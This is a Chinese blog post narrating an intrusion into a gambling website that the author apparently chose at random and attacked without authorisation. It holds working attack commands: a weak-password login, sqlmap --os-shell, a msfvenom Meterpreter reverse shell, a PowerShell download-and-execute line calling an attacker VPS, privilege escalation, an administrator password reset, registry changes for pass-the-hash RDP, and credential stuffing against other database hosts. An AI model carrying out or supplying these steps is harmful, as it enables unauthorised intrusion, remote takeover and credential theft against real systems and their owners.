对某菠菜的渗透测试笔记

枫少@KillBoy Web安全 渗透测试评论219字数 1490阅读4分58秒阅读模式

闲着无聊,网上随便找了一个菠菜进行简单测试,并做笔记记录,大佬们轻喷,有什么不足之处请指教。

弱口令

访问网站就是一个登录页面,没有验证码直接 bp 开启,成功爆出弱口令 admin/123456,直接进入后台。

对某菠菜的渗透测试笔记

sql注入获取权限

翻看了很多功能点,在一处功能点发现上传接口,并尝试上传文件,发现无法上传,加了白名单。直接选择放弃,继续寻找。在某一个 /GroupMember.aspx?gid= 参数上加上单引号,直接报错,SQL 注入这不就来了么。

对某菠菜的渗透测试笔记

说干就干,直接 SQLMAP

对某菠菜的渗透测试笔记

发现为 MSSQL,且 DBA 权限,直接 --os-shell

对某菠菜的渗透测试笔记

上线msf

已经获取普通权限,接下来就是上线 msf 提权。msf 生成 powershell 脚本,并放置在网站目录下

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=8888 -f psh-reflection >xx.ps1

对某菠菜的渗透测试笔记

Vps 开启监听

对某菠菜的渗透测试笔记

使用 powershell 上线 session

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/xx.ps1'))"

对某菠菜的渗透测试笔记

如果想要通过 url 拼接堆叠执行 powershell 会存在一个问题,就是单引号闭合问题。我们可以通过对 powershell 进行编码一下,这样就可以绕过单引号的问题。下面推荐一个不错的网站。

https://r0yanx.com/tools/java_exec_encode/

提权

session 已经上线,接下来目标就是获取 system 权限。很幸运直接 getsystem 可以获取 system 权限。如果需要提权推荐土豆家族提权,实战中成功率很高,影响的服务器版本也很多。

对某菠菜的渗透测试笔记

迁移一下进程,防止进程掉线。

对某菠菜的渗透测试笔记

远程登录服务器

发现服务器开启 3389 端口,因为是 system 权限,且为 2012 系统,大于 2008 版本都是无法抓到明文密码,直接修改 adminnistrator 密码。(实战中不推荐直接修改管理员密码)

对某菠菜的渗透测试笔记

对某菠菜的渗透测试笔记

利用hash远程登录管理员账号

因为是 win2012 无法获取明文密码,直接修改管理员密码稍有些不妥。尝试通过获取管理员 NTLM 远程登录机器。(并非同一台,这只是提供一个思路)

对某菠菜的渗透测试笔记

使用 hash 远程登录 RDP,需要开启 "Restricted Admin Mode"

// 开启Restricted Admin mode
REG ADD "HKLMSystemCurrentControlSetControlLsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

// 查看是否已开启,0x0则表示开启
REG query "HKLMSystemCurrentControlSetControlLsa" | findstr "DisableRestrictedAdmin"

对某菠菜的渗透测试笔记

成功利用 hash 远程管理员桌面

对某菠菜的渗透测试笔记

对某菠菜的渗透测试笔记

其他

前期发现 1433 端口开放着,寻找数据库配置文件,登录数据库。

对某菠菜的渗透测试笔记

通过 fofa 找了一下,资产还是挺多的,且很多都开放 1433 端口,猜测会存在同一个人部署的网站,尝试用获取的密码对这些资产的 1433 端口进行爆破,成功撞到几台数据库,且都是 sa 权限。结束。

对某菠菜的渗透测试笔记

 

本文作者:kone原文地址:https://xz.aliyun.com/t/12501

免责声明:本站某些文章、信息、图片、软件等来源于互联网,由本网整理发表,希望传递更多信息和学习之目的,并不意味赞同起观点或证实其内容的真实性以及非法用途。 如设计、版权等问题,请立即联系管理员,我们会给予更改或删除相关文章,保证您的权利。
高性能云服务器2折起
 
枫少@KillBoy
匿名

发表评论

匿名网友

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: